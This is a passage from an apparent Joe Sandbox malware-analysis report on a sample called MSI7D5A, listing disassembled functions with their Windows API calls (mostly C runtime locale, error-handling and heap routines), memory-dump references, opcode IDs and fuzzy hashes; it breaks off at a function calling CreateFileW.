                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocale
                                                      • String ID:
                                                      • API String ID: 3736152602-0
                                                      • Opcode ID: 285d71cc9c45deafcdffbc9e411bddd2d9dbb603e5186b40f789fa88f6d50211
                                                      • Instruction ID: 0a2cf3719510237614b616c8ae3fc422764b53a2c364cd42a5eb6093f7211777
                                                      • Opcode Fuzzy Hash: 285d71cc9c45deafcdffbc9e411bddd2d9dbb603e5186b40f789fa88f6d50211
                                                      • Instruction Fuzzy Hash: 88F0CD36A00212BBDB2CD764CD49BBA776CFB44754F15C8A4EC19A3580EA74FD41C6D4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A7E1AC Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A757CC: GetLastError.KERNEL32(?,00000008,00A7AD4C), ref: 00A757D0
                                                        • Part of subcall function 00A757CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00A75872
                                                      • EnumSystemLocalesW.KERNEL32(00A7E48A,00000001,?,?,-00000050,?,00A7E82C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00A7E1F6
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2417226690-0
                                                      • Opcode ID: d0efaaa054ba1697254cc1d7ec5a1b85ec5a9f7900a326801f5d544b2e8c8139
                                                      • Instruction ID: 810c88ff35b7d4e271fa167ed530796d45c0d4ffdfe0c9ae266e85e4985e9376
                                                      • Opcode Fuzzy Hash: d0efaaa054ba1697254cc1d7ec5a1b85ec5a9f7900a326801f5d544b2e8c8139
                                                      • Instruction Fuzzy Hash: 86F046363003046FCB249F348C85A7A7B98FF84728F04C46CF9098BA90D6B19C42CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A77132 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A71C9A: EnterCriticalSection.KERNEL32(-00A9DE50,?,00A73576,?,00A9A078,0000000C,00A73841,?), ref: 00A71CA9
                                                      • EnumSystemLocalesW.KERNEL32(00A77125,00000001,00A9A1D8,0000000C,00A77554,00000000), ref: 00A7716A
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                      • String ID:
                                                      • API String ID: 1272433827-0
                                                      • Opcode ID: ce5f0eb0f6da418e170422f3a8242d3c211f650528450974a9ce79eff01c3f3b
                                                      • Instruction ID: b6918d41c5e8415d4199ed99835d5883b9fec7347f7e3751db36a5e717783127
                                                      • Opcode Fuzzy Hash: ce5f0eb0f6da418e170422f3a8242d3c211f650528450974a9ce79eff01c3f3b
                                                      • Instruction Fuzzy Hash: 7AF04972B44200EFDB00DF98E946B9D77F0FB48722F10865AF419DB2A1EB7589018F50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A7E0C6 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A757CC: GetLastError.KERNEL32(?,00000008,00A7AD4C), ref: 00A757D0
                                                        • Part of subcall function 00A757CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00A75872
                                                      • EnumSystemLocalesW.KERNEL32(00A7E01F,00000001,?,?,?,00A7E88A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00A7E0FD
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2417226690-0
                                                      • Opcode ID: 8dc6f82c583acf0abb442423a59a3579f53f0a1786eb198d42b10917834e5d6c
                                                      • Instruction ID: 9361163250455475fcced1ea248636068d38111c1ea0d610d107361db76e57a1
                                                      • Opcode Fuzzy Hash: 8dc6f82c583acf0abb442423a59a3579f53f0a1786eb198d42b10917834e5d6c
                                                      • Instruction Fuzzy Hash: C5F0E53A3402059BCB04EF35DC4966A7F95EFC5760F06C498EA098B651C6B5D883C790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A623F8 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,00A600E2,00000000,00000000,00000004,00A5ED14,00000000,00000004,00A5F127,00000000,00000000), ref: 00A62410
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID:
                                                      • API String ID: 2299586839-0
                                                      • Opcode ID: e4ce0bc826cb39ed61deb0bad88228d7275c55b724fad32e8707107e0aec8df3
                                                      • Instruction ID: cf12368a4e2442033710d5ed78cd88f19a5a2327e565524058e346b3788fb4b9
                                                      • Opcode Fuzzy Hash: e4ce0bc826cb39ed61deb0bad88228d7275c55b724fad32e8707107e0aec8df3
                                                      • Instruction Fuzzy Hash: 3EE0D832664105B6D7258BBD9E0FFBE76B8D700709F504151E902E40D1DEA1CA00A361
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A776AF Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00A74E3F,?,20001004,00000000,00000002,?,?,00A74441), ref: 00A776E3
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID:
                                                      • API String ID: 2299586839-0
                                                      • Opcode ID: 79cd40fd641aceb53fadbf4b0184a7f7c7166f3f367419f813f283a4c6f1af85
                                                      • Instruction ID: 5b9153a8d3e8c4d363618d5790f78f2df7334b5376cd44b62330dc1fb82290b8
                                                      • Opcode Fuzzy Hash: 79cd40fd641aceb53fadbf4b0184a7f7c7166f3f367419f813f283a4c6f1af85
                                                      • Instruction Fuzzy Hash: D4E04F3250862CBBCF126F61DD08AAE7E26FF44760F10C021FC1965121DB71CD21ABD5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6353F Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0002354B,00A63077), ref: 00A63544
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 0f204d255119c996b021e9bee1a070acc027d176606150b70da9389701ea0c59
                                                      • Instruction ID: a7085a955682f42de6e19af1085eaea0375d82ee78f9a7b9f16aadc0efb0ee7d
                                                      • Opcode Fuzzy Hash: 0f204d255119c996b021e9bee1a070acc027d176606150b70da9389701ea0c59
                                                      • Instruction Fuzzy Hash:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A42310 Relevance: 1.3, APIs: 1, Instructions: 64memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A62C98: EnterCriticalSection.KERNEL32(00A9DD3C,?,?,?,00A423B6,00A9E638,838A949E,?,?,00A83D6D,000000FF), ref: 00A62CA3
                                                        • Part of subcall function 00A62C98: LeaveCriticalSection.KERNEL32(00A9DD3C,?,?,?,00A423B6,00A9E638,838A949E,?,?,00A83D6D,000000FF), ref: 00A62CE0
                                                      • GetProcessHeap.KERNEL32 ref: 00A42365
                                                        • Part of subcall function 00A62C4E: EnterCriticalSection.KERNEL32(00A9DD3C,?,?,00A42427,00A9E638,00A86B40), ref: 00A62C58
                                                        • Part of subcall function 00A62C4E: LeaveCriticalSection.KERNEL32(00A9DD3C,?,?,00A42427,00A9E638,00A86B40), ref: 00A62C8B
                                                        • Part of subcall function 00A62C4E: RtlWakeAllConditionVariable.NTDLL ref: 00A62D02
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
                                                      • String ID:
                                                      • API String ID: 325507722-0
                                                      • Opcode ID: 00937b814adc89663c1aa81fe9b3c3db12fb772f87c4a9cf941dfcbb6376e9e2
                                                      • Instruction ID: 0504229c6a2678a219fab91a9c77cac1d88f8ae5c89a28e12ab8e63ef7af3561
                                                      • Opcode Fuzzy Hash: 00937b814adc89663c1aa81fe9b3c3db12fb772f87c4a9cf941dfcbb6376e9e2
                                                      • Instruction Fuzzy Hash: 6D21ACB1B41680EFDB10DF98ED46B4977F0F724720F00061AE625972E2EFB059068B52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A70A48 Relevance: .7, Instructions: 655COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: AllocHeap
                                                      • String ID:
                                                      • API String ID: 4292702814-0
                                                      • Opcode ID: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                      • Instruction ID: 635c01da13fd47fb6569600f131d305e91eba06c2e9995d7ef5d92162fdc0a06
                                                      • Opcode Fuzzy Hash: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                      • Instruction Fuzzy Hash: 21328D74A0021ADFCF24CFA8CD91ABEB7B5EF44304F14C169D949AB315D632AE46CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A792A9 Relevance: .6, Instructions: 637COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 00f2f1f34840823b6a67aa84dd0937fbb26e04e0e2d90f23e55c84318264310b
                                                      • Instruction ID: 03f652df8055d4b1de5b853ebed9c5318e11bca86db446c63c891fa528f1f40d
                                                      • Opcode Fuzzy Hash: 00f2f1f34840823b6a67aa84dd0937fbb26e04e0e2d90f23e55c84318264310b
                                                      • Instruction Fuzzy Hash: 55321731D29F414DD7239635DC6233AA359AFB73C4F15D727E81AB5AB9EB29C8834200
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6A915 Relevance: .4, Instructions: 388COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c5b75114470ef0085eb6c68b003d6cabd22de0bf3d51c00aae4bcdcb5154a9f
                                                      • Instruction ID: edeb29516badb2d6ab78ba9f5cccd13ce296a64138c4fb3f5b8d3e5617bbe0cb
                                                      • Opcode Fuzzy Hash: 3c5b75114470ef0085eb6c68b003d6cabd22de0bf3d51c00aae4bcdcb5154a9f
                                                      • Instruction Fuzzy Hash: 20E1AF706006058FCB25CFA8C680ABEB7F1FF65314F24865AD556AB691D730ED81CF62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A7D8D5 Relevance: .3, Instructions: 327COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                      • String ID:
                                                      • API String ID: 3471368781-0
                                                      • Opcode ID: b6b3994cc5f955dd5509a34dd0df2172c7c8322eb5e2b88f0b323a7ee94fd18e
                                                      • Instruction ID: 9c2d0e009fb98bcf341a53dbc827be5f96f40b1830d2a6d3182321863b2c6498
                                                      • Opcode Fuzzy Hash: b6b3994cc5f955dd5509a34dd0df2172c7c8322eb5e2b88f0b323a7ee94fd18e
                                                      • Instruction Fuzzy Hash: 51B1E5756007059BDB389F24CD92ABBB3B8FF84318F14C56DEA8B86580FA75E981C710
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6C2CA Relevance: .2, Instructions: 158COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
                                                      • Instruction ID: 8001321c6c188a890612001999ca7b3fd789afd1da6ecdfc8797dd1eb59a4b90
                                                      • Opcode Fuzzy Hash: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
                                                      • Instruction Fuzzy Hash: AE516272E00219AFDF14CF99C951ABEBBB2EF88310F598059E855AB241D7349E50CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A64920 Relevance: .1, Instructions: 76COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                      • Instruction ID: c3823a12407b5e2e79ff6b2564fc64260f6a050e572b3d4f3463455926954af3
                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                      • Instruction Fuzzy Hash: 68112BB72C514243E605CB3EC4B45B7E7B5EBCE32572D437AD0918B758D222E945D600
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A7AD78 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                      • Instruction ID: 8ffcc29e7aecd38169b810a3a2f33860cc475b45005965fd41ce2986965ec726
                                                      • Opcode Fuzzy Hash: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                      • Instruction Fuzzy Hash: C1E08C72911238EBCB24DB98CE04E8EF3ECEB84B01B15849AF505D3501C270DE00D7D1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A72DCC Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
                                                      • Instruction ID: b20e1e0ea89c481f2d8fc1ce6ead4ad59168cdc9646f30a2ceae3438059b653d
                                                      • Opcode Fuzzy Hash: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
                                                      • Instruction Fuzzy Hash: ADC08C34400E0046DE398A108EB13A83354B7E1783F80C68CC40B0BA47C51EAC83D701
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A60116 Relevance: 30.3, APIs: 20, Instructions: 287COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A6011D
                                                      • collate.LIBCPMT ref: 00A60126
                                                        • Part of subcall function 00A5EDF2: __EH_prolog3_GS.LIBCMT ref: 00A5EDF9
                                                        • Part of subcall function 00A5EDF2: __Getcoll.LIBCPMT ref: 00A5EE5D
                                                      • __Getcoll.LIBCPMT ref: 00A6016C
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A60180
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A60195
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A601D3
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A601E6
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A6022C
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A60260
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A6031B
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A6032E
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A6034B
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A60368
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A60385
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A602BD
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • numpunct.LIBCPMT ref: 00A603C4
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A603D4
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A60418
                                                        • Part of subcall function 00A46330: LocalAlloc.KERNEL32(00000040,?,00A50E04,00000020,?,?,00A49942,00000000,838A949E,?,?,?,?,00A850DD,000000FF), ref: 00A46336
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A6042B
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A60448
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: AddfacLocimp::_Locimp_std::locale::_$GetcollLockitstd::_$AllocH_prolog3H_prolog3_LocalLockit::_Lockit::~_collatenumpunct
                                                      • String ID:
                                                      • API String ID: 3717464618-0
                                                      • Opcode ID: f9c0803ba297e1abeb7edf2af7a0ce76b49793133768ef2936eb1b9567d210aa
                                                      • Instruction ID: 4270d4ff9a2a9c95488385db62ab30513204b8e11cc2cdb98a51d52e234a4b03
                                                      • Opcode Fuzzy Hash: f9c0803ba297e1abeb7edf2af7a0ce76b49793133768ef2936eb1b9567d210aa
                                                      • Instruction Fuzzy Hash: 2791F771D022116FEB24BFB44E46F7F7AB8EF81760F10452DF919AB281DE74994087A2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A46600 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 319filememoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00A4667E
